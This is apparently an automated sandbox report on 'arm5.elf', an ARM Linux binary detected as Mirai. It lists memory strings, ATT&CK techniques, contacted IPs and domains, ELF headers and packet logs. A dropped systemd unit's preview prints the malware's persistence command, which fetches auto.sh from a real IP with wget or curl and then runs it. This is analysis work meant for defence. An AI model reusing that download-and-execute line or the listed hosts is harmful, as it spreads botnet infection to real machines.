Source: arm5.elf, 6251.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6415.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6417.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6426.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6434.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6436.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6443.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6452.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6454.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6463.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6465.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6494.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6497.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6503.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6512.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6514.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6523.1.0000564aaf725000.0000564aaf874000.rw-.sdmpBinary or memory string: JV!/etc/qemu-binfmt/arm
Source: arm5.elf, 6673.1.0000564aaf725000.0000564aaf874000.rw-.sdmpBinary or memory string: p$0!/proc/79/cmdline1/tmp/vmware-root_721-4290559889
Source: arm5.elf, 6251.1.00007fff73111000.00007fff73132000.rw-.sdmpBinary or memory string: /tmp/qemu-open.3Oc7gU
Source: arm5.elf, 6673.1.0000564aaf725000.0000564aaf874000.rw-.sdmpBinary or memory string: /arm/var/lib/vmware/VGAuth
Source: arm5.elf, 6673.1.0000564aaf725000.0000564aaf874000.rw-.sdmpBinary or memory string: JV/arm/var/lib/vmware/VGAuth/aliasStoreP /var/lib/PackageKitQpO
Source: arm5.elf, 6673.1.00007fba34045000.00007fba34250000.rw-.sdmpBinary or memory string: /var/lib/vmware
Source: arm5.elf, 6673.1.00007fba34045000.00007fba34250000.rw-.sdmpBinary or memory string: 8/var/lib/vmware/VGAuth/aliasStore
Source: arm5.elf, 6673.1.0000564aaf725000.0000564aaf874000.rw-.sdmpBinary or memory string: JV/arm/var/lib/vmware1
Source: arm5.elf, 6673.1.0000564aaf725000.0000564aaf874000.rw-.sdmpBinary or memory string: P /var/lib/vmwareQ
Source: arm5.elf, 6673.1.00007fba34045000.00007fba34250000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth/aliasStore
Source: arm5.elf, 6673.1.00007fba34045000.00007fba34250000.rw-.sdmpBinary or memory string: /var/lib/vmware4/var/lib/PackageKit
Source: arm5.elf, 6673.1.0000564aaf725000.0000564aaf874000.rw-.sdmpBinary or memory string: P /var/lib/vmware/VGAuthQ
Source: arm5.elf, 6673.1.00007fba34034000.00007fba34045000.rw-.sdmpBinary or memory string: T/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f/tmpX/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj\/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj/tmp$/tmp/vmware-root_721-4290559889P/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i4/tmp/snap.lxd
Source: arm5.elf, 6673.1.0000564aaf725000.0000564aaf874000.rw-.sdmpBinary or memory string: /tmp/vmware-root_721-4290559889
Source: arm5.elf, 6673.1.00007fba34045000.00007fba34250000.rw-.sdmpBinary or memory string: (/var/lib/vmware/VGAuth/aliasStore
Source: arm5.elf, 6673.1.0000564aaf725000.0000564aaf874000.rw-.sdmpBinary or memory string: JV/arm/var/lib/vmware/VGAuthP0/var/lib/vmware/VGAuth/aliasStoreQO
Source: arm5.elf, 6251.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6415.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6417.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6426.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6434.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6436.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6443.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6452.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6454.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6463.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6465.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6494.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6497.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6503.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6512.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6514.1.0000564aaf725000.0000564aaf874000.rw-.sdmp, arm5.elf, 6523.1.0000564aaf725000.0000564aaf874000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: arm5.elf, 6673.1.00007fba34045000.00007fba34250000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth
Source: arm5.elf, 6251.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6415.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6417.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6426.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6434.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6436.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6443.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6452.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6454.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6463.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6465.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6494.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6497.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6503.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6512.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6514.1.00007fff73111000.00007fff73132000.rw-.sdmp, arm5.elf, 6523.1.00007fff73111000.00007fff73132000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: arm5.elf, 6251.1.00007fff73111000.00007fff73132000.rw-.sdmpBinary or memory string: JV/tmp/qemu-open.3Oc7gU:
Source: arm5.elf, 6673.1.00007fba34045000.00007fba34250000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth4/var/lib/NetworkManager|P

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting		Valid AccountsWindows Management Instrumentation1
Systemd Service		1
Systemd Service		1
Hidden Files and Directories		1
OS Credential Dumping		11
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting		Boot or Logon Initialization Scripts1
Indicator Removal		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
File Deletion		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol		Traffic DuplicationData Destruction

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583069 Sample: arm5.elf Startdate: 01/01/2025 Architecture: LINUX Score: 72 43 tcpdown.suo. [malformed] 2->43 45 109.202.202.202, 80 INIT7CH Switzerland 2->45 47 5 other IPs or domains 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 51 Multi AV Scanner detection for submitted file 2->51 9 dash rm arm5.elf 2->9         started        12 gnome-session-binary sh gsd-rfkill 2->12         started        14 dash rm 2->14         started        16 5 other processes 2->16 signatures3 53 Sends malformed DNS queries 43->53 process4 signatures5 59 Sample deletes itself 9->59 18 arm5.elf 9->18         started        process6 process7 20 arm5.elf 18->20         started        23 arm5.elf sh 18->23         started        25 arm5.elf sh 18->25         started        27 arm5.elf 18->27         started        signatures8 55 Manipulation of devices in /dev 20->55 57 Deletes system log files 20->57 29 arm5.elf 20->29         started        31 arm5.elf 20->31         started        33 arm5.elf 20->33         started        41 42 other processes 20->41 35 sh systemctl 23->35         started        37 sh systemctl 25->37         started        39 arm5.elf 27->39         started        process9

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
arm5.elf51%VirustotalBrowse
arm5.elf53%ReversingLabsLinux.Trojan.Mirai
arm5.elf100%AviraEXP/ELF.Mirai.W

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
tcpdown.su
45.200.149.249
truefalse
    		high
    tcpdown.su|1
    		unknown
    		unknownfalse
      		unknown
      tcpdown.suo. [malformed]
      		unknown
      		unknowntrue
        		unknown
        tcpdown.su
        		unknown
        		unknownfalse
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://154.216.18.192/auto.shstartup_command.service.17.drfalse
            		high
            http://154.216.18.192/auto.sh;arm5.elf, startup_command.service.17.drfalse
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              107.175.130.16
              		unknownUnited States
              		36352AS-COLOCROSSINGUSfalse
              109.202.202.202
              		unknownSwitzerland
              		13030INIT7CHfalse
              45.200.149.249
              		tcpdown.suSeychelles
              		328608Africa-on-Cloud-ASZAfalse
              91.189.91.43
              		unknownUnited Kingdom
              		41231CANONICAL-ASGBfalse
              91.189.91.42
              		unknownUnited Kingdom
              		41231CANONICAL-ASGBfalse

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              107.175.130.16arm.elfGet hashmaliciousUnknownBrowse
                arm5.elfGet hashmaliciousUnknownBrowse
                  109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                  • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                  45.200.149.249mpsl.elfGet hashmaliciousUnknownBrowse
                    mpsl.elfGet hashmaliciousUnknownBrowse
                      mips.elfGet hashmaliciousUnknownBrowse
                        91.189.91.43mpsl.elfGet hashmaliciousUnknownBrowse
                          Mozi.m.elfGet hashmaliciousUnknownBrowse
                            lx64.elfGet hashmaliciousUnknownBrowse
                              arm.elfGet hashmaliciousUnknownBrowse
                                mips.elfGet hashmaliciousUnknownBrowse
                                  arm6.elfGet hashmaliciousUnknownBrowse
                                    bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                      185.232.205.48-bot.mpsl-2025-01-01T09_56_39.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                        B_Y_T_E_x86.elfGet hashmaliciousMirai, OkiruBrowse
                                          i.elfGet hashmaliciousUnknownBrowse
                                            91.189.91.42mpsl.elfGet hashmaliciousUnknownBrowse
                                              loligang.m68k.elfGet hashmaliciousMiraiBrowse
                                                Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                  lx64.elfGet hashmaliciousUnknownBrowse
                                                    arm.elfGet hashmaliciousUnknownBrowse
                                                      mips.elfGet hashmaliciousUnknownBrowse
                                                        arm6.elfGet hashmaliciousUnknownBrowse
                                                          bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                            185.232.205.48-bot.mpsl-2025-01-01T09_56_39.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                              B_Y_T_E_x86.elfGet hashmaliciousMirai, OkiruBrowse

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                tcpdown.sux86_64.crdownload.0.drGet hashmaliciousUnknownBrowse
                                                                • 104.168.45.11
                                                                jmhrc116WA.elfGet hashmaliciousUnknownBrowse
                                                                • 172.245.119.70

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CANONICAL-ASGBmpsl.elfGet hashmaliciousUnknownBrowse
                                                                • 91.189.91.42
                                                                loligang.m68k.elfGet hashmaliciousMiraiBrowse
                                                                • 91.189.91.42
                                                                Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                                • 91.189.91.42
                                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                                • 185.125.190.26
                                                                lx64.elfGet hashmaliciousUnknownBrowse
                                                                • 91.189.91.42
                                                                arm.elfGet hashmaliciousUnknownBrowse
                                                                • 91.189.91.42
                                                                mips.elfGet hashmaliciousUnknownBrowse
                                                                • 91.189.91.42
                                                                arm6.elfGet hashmaliciousUnknownBrowse
                                                                • 91.189.91.42
                                                                bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                • 91.189.91.42
                                                                185.232.205.48-bot.mpsl-2025-01-01T09_56_39.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                • 91.189.91.42
                                                                Africa-on-Cloud-ASZAmpsl.elfGet hashmaliciousUnknownBrowse
                                                                • 45.200.149.249
                                                                DF2.exeGet hashmaliciousUnknownBrowse
                                                                • 45.200.148.158
                                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                                • 45.200.149.249
                                                                mips.elfGet hashmaliciousUnknownBrowse
                                                                • 45.200.149.249
                                                                http://trezorbridge.org/Get hashmaliciousUnknownBrowse
                                                                • 45.200.149.223
                                                                vcimanagement.armv4l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 156.228.63.21
                                                                vcimanagement.armv7l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 156.228.216.13
                                                                vcimanagement.powerpc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 156.228.141.216
                                                                vcimanagement.armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 156.228.204.74
                                                                vcimanagement.mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 156.240.215.166
                                                                AS-COLOCROSSINGUSmpsl.elfGet hashmaliciousUnknownBrowse
                                                                • 104.168.33.8
                                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                                • 104.168.33.8
                                                                arm.elfGet hashmaliciousUnknownBrowse
                                                                • 23.94.37.42
                                                                mips.elfGet hashmaliciousUnknownBrowse
                                                                • 104.168.33.8
                                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                                • 23.94.37.42
                                                                boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                • 104.168.45.33
                                                                boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                • 104.168.45.33
                                                                boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                                • 104.168.45.33
                                                                boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                • 104.168.45.33
                                                                boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                                • 104.168.45.33
                                                                INIT7CHmpsl.elfGet hashmaliciousUnknownBrowse
                                                                • 109.202.202.202
                                                                loligang.m68k.elfGet hashmaliciousMiraiBrowse
                                                                • 109.202.202.202
                                                                Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                                • 109.202.202.202
                                                                lx64.elfGet hashmaliciousUnknownBrowse
                                                                • 109.202.202.202
                                                                arm.elfGet hashmaliciousUnknownBrowse
                                                                • 109.202.202.202
                                                                mips.elfGet hashmaliciousUnknownBrowse
                                                                • 109.202.202.202
                                                                arm6.elfGet hashmaliciousUnknownBrowse
                                                                • 109.202.202.202
                                                                bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                • 109.202.202.202
                                                                185.232.205.48-bot.mpsl-2025-01-01T09_56_39.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                • 109.202.202.202
                                                                B_Y_T_E_x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 109.202.202.202

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                /etc/systemd/system/startup_command.service

                                                                Download File
                                                                Process:/tmp/arm5.elf
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):361
                                                                Entropy (8bit):5.140421405816541
                                                                Encrypted:false
                                                                SSDEEP:6:z8jvIERZAMzdK+KOnFfltZCrXb1vN16R1E/Ls7QkhILQmWA4Rv:z+vIERZAOK+PCrXpvL6vJ73GLHWrv
                                                                MD5:4D2C868F454B6C55731485CF0F886DC0
                                                                SHA1:032B125DE0A28DCEE8D8D25FBEEB56DB7F403F04
                                                                SHA-256:8C4AE1B82477698F3A8C273B439CB9079794AFB8FC33CD4DEF854936BA37EA2C
                                                                SHA-512:060B2413A0CB2DEC0DB059C190467B5CB0D76209EFFEA4AE3DE2701FA71429B811A6F7E11E813B26806CF72578D1F32B608A02A4CE670EC58B5B65433E3CF11D
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:[Unit].Description=Startup Command.After=network.target..[Service].ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh (null).RemainAfterExit=yes..[Install].WantedBy=multi-user.target.

                                                                /memfd:snapd-env-generator (deleted)

                                                                Download File
                                                                Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):76
                                                                Entropy (8bit):3.7627880354948586
                                                                Encrypted:false
                                                                SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

                                                                /tmp/qemu-open.3Oc7gU (deleted)

                                                                Download File
                                                                Process:/tmp/arm5.elf
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):14
                                                                Entropy (8bit):3.521640636343319
                                                                Encrypted:false
                                                                SSDEEP:3:TggLAJ5:Tgg03
                                                                MD5:A737667E3E61E716C83359F35BC141DA
                                                                SHA1:E7C3DBC96B90E28F18CFB1CADE0C7AF673FFAA57
                                                                SHA-256:2D8A0F430A3339E16B223D653251534539D95B1DF7142834F68D9172B1656E37
                                                                SHA-512:0ACAFC3F3F40EDEF3D9F2F1CCE09BAF5004FD8488434F4903F18B9B7E77B4A6CDF7F84A47856CB2FDAA4B1B0F70FC2A3EDDE82BD29831FF54CB75F4E4C74FE74
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:/tmp/arm5.elf.

                                                                Static File Info

                                                                General

                                                                File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                                                Entropy (8bit):5.814813223583491
                                                                TrID:
                                                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                File name:arm5.elf
                                                                File size:83'344 bytes
                                                                MD5:8114773b3827da1450fa61dda0679c8b
                                                                SHA1:db663b5e80ce27edbb3d06b81bca78b45cc5b1dc
                                                                SHA256:b6720048ed8dc114296bb3007adca57f649247dddadde777b00019aaadd1d360
                                                                SHA512:c7c86749ad2c4395ba5d9156fe271d6522406245fba31f3febc57b451cdc70ba070b7652bf753c534c0d51b8c1460bff9cca4ea93023521a3f1957280bd71aa8
                                                                SSDEEP:1536:ih+1IWRBh2N3+SDY/uFMPpa/C4fNXAVBhhl8Xx4UngTBgl:ih+ba0dBa/CaVAVbhlCOTSl
                                                                TLSH:30833B92BD815A13C5D5227BF76E028D372663A8D3EF3243DD266F21378692B0D77601
                                                                File Content Preview:.ELF...a..........(.........4....D......4. ...(......................8...8...............@...@...@..................Q.td..................................-...L."...\C..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                                                Static ELF Info

                                                                ELF header

                                                                Class:ELF32
                                                                Data:2's complement, little endian
                                                                Version:1 (current)
                                                                Machine:ARM
                                                                Version Number:0x1
                                                                Type:EXEC (Executable file)
                                                                OS/ABI:ARM - ABI
                                                                ABI Version:0
                                                                Entry Point Address:0x8190
                                                                Flags:0x2
                                                                ELF Header Size:52
                                                                Program Header Offset:52
                                                                Program Header Size:32
                                                                Number of Program Headers:3
                                                                Section Header Offset:82944
                                                                Section Header Size:40
                                                                Number of Section Headers:10
                                                                Header String Table Index:9

                                                                Sections

                                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                NULL0x00x00x00x00x0000
                                                                .initPROGBITS0x80940x940x180x00x6AX004
                                                                .textPROGBITS0x80b00xb00x10da80x00x6AX0016
                                                                .finiPROGBITS0x18e580x10e580x140x00x6AX004
                                                                .rodataPROGBITS0x18e6c0x10e6c0x2a780x00x2A004
                                                                .ctorsPROGBITS0x240000x140000x80x00x3WA004
                                                                .dtorsPROGBITS0x240080x140080x80x00x3WA004
                                                                .dataPROGBITS0x240140x140140x3ac0x00x3WA004
                                                                .bssNOBITS0x243c00x143c00xe7140x00x3WA004
                                                                .shstrtabSTRTAB0x00x143c00x3e0x00x0001

                                                                Program Segments

                                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                LOAD0x00x80000x80000x138e40x138e45.92410x5R E0x8000.init .text .fini .rodata
                                                                LOAD0x140000x240000x240000x3c00xead42.76480x6RW 0x8000.ctors .dtors .data .bss
                                                                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 1, 2025 18:41:50.417949915 CET43928443192.168.2.2391.189.91.42
                                                                Jan 1, 2025 18:41:51.983058929 CET381722601192.168.2.2345.200.149.249
                                                                Jan 1, 2025 18:41:51.987915993 CET26013817245.200.149.249192.168.2.23
                                                                Jan 1, 2025 18:41:51.987999916 CET381722601192.168.2.2345.200.149.249
                                                                Jan 1, 2025 18:41:51.992346048 CET381722601192.168.2.2345.200.149.249
                                                                Jan 1, 2025 18:41:51.997083902 CET26013817245.200.149.249192.168.2.23
                                                                Jan 1, 2025 18:41:51.997124910 CET381722601192.168.2.2345.200.149.249
                                                                Jan 1, 2025 18:41:52.001912117 CET26013817245.200.149.249192.168.2.23
                                                                Jan 1, 2025 18:41:52.805953979 CET26013817245.200.149.249192.168.2.23
                                                                Jan 1, 2025 18:41:52.806148052 CET381722601192.168.2.2345.200.149.249
                                                                Jan 1, 2025 18:41:52.806148052 CET381722601192.168.2.2345.200.149.249
                                                                Jan 1, 2025 18:41:55.797171116 CET42836443192.168.2.2391.189.91.43
                                                                Jan 1, 2025 18:41:56.817022085 CET4251680192.168.2.23109.202.202.202
                                                                Jan 1, 2025 18:41:58.342628002 CET570967722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:58.347486973 CET772257096107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:58.347548008 CET570967722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:58.349318981 CET570967722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:58.349364996 CET570967722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:58.354084015 CET772257096107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:58.388273954 CET570987722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:58.393199921 CET772257098107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:58.393253088 CET570987722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:58.394457102 CET772257096107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:58.419857025 CET570987722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:58.419967890 CET570987722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:58.424664974 CET772257098107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:58.470477104 CET772257098107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:58.712631941 CET772257096107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:58.712940931 CET570967722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:58.759671926 CET772257098107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:58.759718895 CET570987722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:58.775278091 CET571007722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:58.780080080 CET772257100107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:58.780163050 CET571007722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:58.781451941 CET571007722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:58.781451941 CET571007722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:58.786262989 CET772257100107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:58.826612949 CET772257100107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:59.020112991 CET571027722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:59.025121927 CET772257102107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:59.025173903 CET571027722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:59.028956890 CET571027722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:59.029009104 CET571027722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:59.033723116 CET772257102107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:59.046037912 CET571047722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:59.050817013 CET772257104107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:59.050973892 CET571047722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:59.078531981 CET772257102107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:59.107074022 CET571047722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:59.107122898 CET571047722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:59.111875057 CET772257104107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:59.154532909 CET772257104107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:59.156517029 CET772257100107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:59.156578064 CET571007722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:59.264859915 CET571067722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:59.269944906 CET772257106107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:59.269994974 CET571067722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:59.273803949 CET571067722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:59.273854017 CET571067722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:59.278642893 CET772257106107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:59.322469950 CET772257106107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:59.397531033 CET772257102107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:59.397623062 CET571027722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:59.419223070 CET772257104107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:59.419282913 CET571047722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:41:59.656899929 CET772257106107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:41:59.656963110 CET571067722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:42:04.047020912 CET571087722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:42:04.051907063 CET772257108107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:42:04.052004099 CET571087722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:42:04.052495956 CET571107722192.168.2.23107.175.130.16
